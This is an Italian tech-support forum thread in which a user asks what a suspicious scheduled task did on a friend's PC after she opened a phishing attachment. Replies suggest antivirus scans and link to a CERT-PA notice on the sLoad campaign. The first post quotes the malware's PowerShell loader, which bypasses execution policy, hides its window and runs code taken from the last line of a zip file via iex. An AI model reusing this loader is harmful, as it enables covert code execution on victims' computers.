|
|
|
|
Strumenti |
18-02-2019, 20:06 | #1 |
Senior Member
Iscritto dal: Jul 2007
Messaggi: 960
|
Powershell
Buonasera, un'amica mi ha interpellato perchè da giorni, dopo che aveva aperto un allegato di una mail sospetta, ogni 5 minuti le compariva una finestra di "taskeng.exe" completamente nera.
Ho provato a controllare se ci fossero degli eventi pianificati strani e ne ho effettivamente trovato uno, che ho subito eliminato, che si attivava ogni 5 minuti e che aveva questa stringa powershell: -ep byPass -w hi""DDen -c &{cd c:\users\;$j=dir -force -r -in aggior*.zip|select -last 1;$r2=cat -LiteralPat $j.fullname;$r2[$r2.length-1]|iex} Sapete dirmi che cosa facesse esattamente? Grazie.
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2 |
19-02-2019, 11:05 | #2 |
Senior Member
Iscritto dal: Feb 2009
Messaggi: 50674
|
Ciao, Cosa facesse, non lo so, ma se è uscita da una e-mail.............non credo che facesse del bene, anzi.........
Hai fatto bene a eliminarla . Bisogna fare attenzione, quando si aprono le e-mail . Se il problema continua, io salverei i dati e reinstallerei il SO da zero . Volendo si possono fare degli scan antivirus e anti-malware . Visto che hai W7, anche con Combofix, da provvisoria .
__________________
Aomei in Prog. & Utility - Lic OEM - Q di Merc Ott '22 - W10 Spot Images Seasons from '20 to Summer 2022 - DailyPic dalle Eccezioni alle Unique Images + Rec > DailyPic Unique Images Novembre 2022 |
19-02-2019, 13:13 | #3 |
Senior Member
Iscritto dal: Jul 2007
Messaggi: 960
|
Fatto sia con MSE che Malawarebytes, zero rilevazioni.
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2 |
19-02-2019, 16:54 | #4 |
Senior Member
Iscritto dal: Feb 2009
Messaggi: 50674
|
Allora sei a posto .
Però un giro con Combofix e con AdwCleaner, io lo farei
__________________
Aomei in Prog. & Utility - Lic OEM - Q di Merc Ott '22 - W10 Spot Images Seasons from '20 to Summer 2022 - DailyPic dalle Eccezioni alle Unique Images + Rec > DailyPic Unique Images Novembre 2022 |
22-02-2019, 08:27 | #5 |
Senior Member
Iscritto dal: Jun 2001
Città: Gorizia/Trieste/Slovenia
Messaggi: 4338
|
__________________
Dio ha fatto il cavo, il diavolo il wireless. "CCIE-level challenges should stay in CCIE labs." (cit I.Pepelnjak) |
22-02-2019, 11:28 | #6 | |
Senior Member
Iscritto dal: Jul 2007
Messaggi: 960
|
Quote:
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2 |
|
04-03-2019, 15:15 | #7 |
Senior Member
Iscritto dal: Apr 2011
Messaggi: 357
|
In https://www.cert-pa.it/notizie/campa...-script-sload/ - Computer Emergency Response Team Pubblica Amministrazione (CERT-PA) all'interno di AgID - la traduzione in italiano. Se in passato era utilizzato per diffondere malware come Ramnit banker forse adesso viene utilizzato per diffonderne di nuovi!
Come giustamente ha detto tallines bisogna stare attentissimi allemail. Sopratutto non aprire allegati sospetti e, per me, essendo windows per sicurezza acquistare un buon antivirus.
__________________
Diffidate da chi dispensa certezze: TUTTI possono sbagliare! - Tutto quello che dico è IMHO (nessuna garanzia ) |
10-03-2019, 09:48 | #8 |
Senior Member
Iscritto dal: Jan 2010
Messaggi: 37003
|
Di questi tempi, mai aprire allegati se non da utenti sicuri al 100%. Ma la regola sarebbe di non aprirli mai.
|
10-03-2019, 14:21 | #9 |
Senior Member
Iscritto dal: Jul 2007
Messaggi: 960
|
In che senso "non aprirli mai"?
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2 |
10-03-2019, 16:11 | #10 |
Senior Member
Iscritto dal: Feb 2009
Messaggi: 50674
|
Come apri la posta, cosa usi per la posta ?
__________________
Aomei in Prog. & Utility - Lic OEM - Q di Merc Ott '22 - W10 Spot Images Seasons from '20 to Summer 2022 - DailyPic dalle Eccezioni alle Unique Images + Rec > DailyPic Unique Images Novembre 2022 |
11-03-2019, 00:30 | #11 |
Senior Member
Iscritto dal: Jul 2007
Messaggi: 960
|
Io personalmente uso Outlook (il programma).
La persona che ha ricevuto la mail in questione usa Outlook (il sito).
__________________
Case: Corsair Graphite Series 600TM -- Scheda Madre: ASUS ROG Crosshair VIII Hero (Wi-Fi) -- CPU: AMD Ryzen 9 5950x -- RAM: G.Skill Trident F4-3600C17D-32GTZ (2x16GB) -- SSD: Samsung MZ-V7S1T0 970 EVO Plus 1TB NVMe -- Scheda Video: MSI Nvidia GTX-1060 Gaming X -- Alimentatore: Seasonic PRIME Ultra 750 Gold -- Sistema Operativo: Windows 10 LTSC 21H2 |
11-03-2019, 09:57 | #12 | |
Senior Member
Iscritto dal: Feb 2009
Messaggi: 50674
|
Quote:
Eudora e Microsoft Outlook sono tra i provider di posta elettronica popolari che permettono di leggere una e-mail senza aprirla.
__________________
Aomei in Prog. & Utility - Lic OEM - Q di Merc Ott '22 - W10 Spot Images Seasons from '20 to Summer 2022 - DailyPic dalle Eccezioni alle Unique Images + Rec > DailyPic Unique Images Novembre 2022 |
|
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 06:52.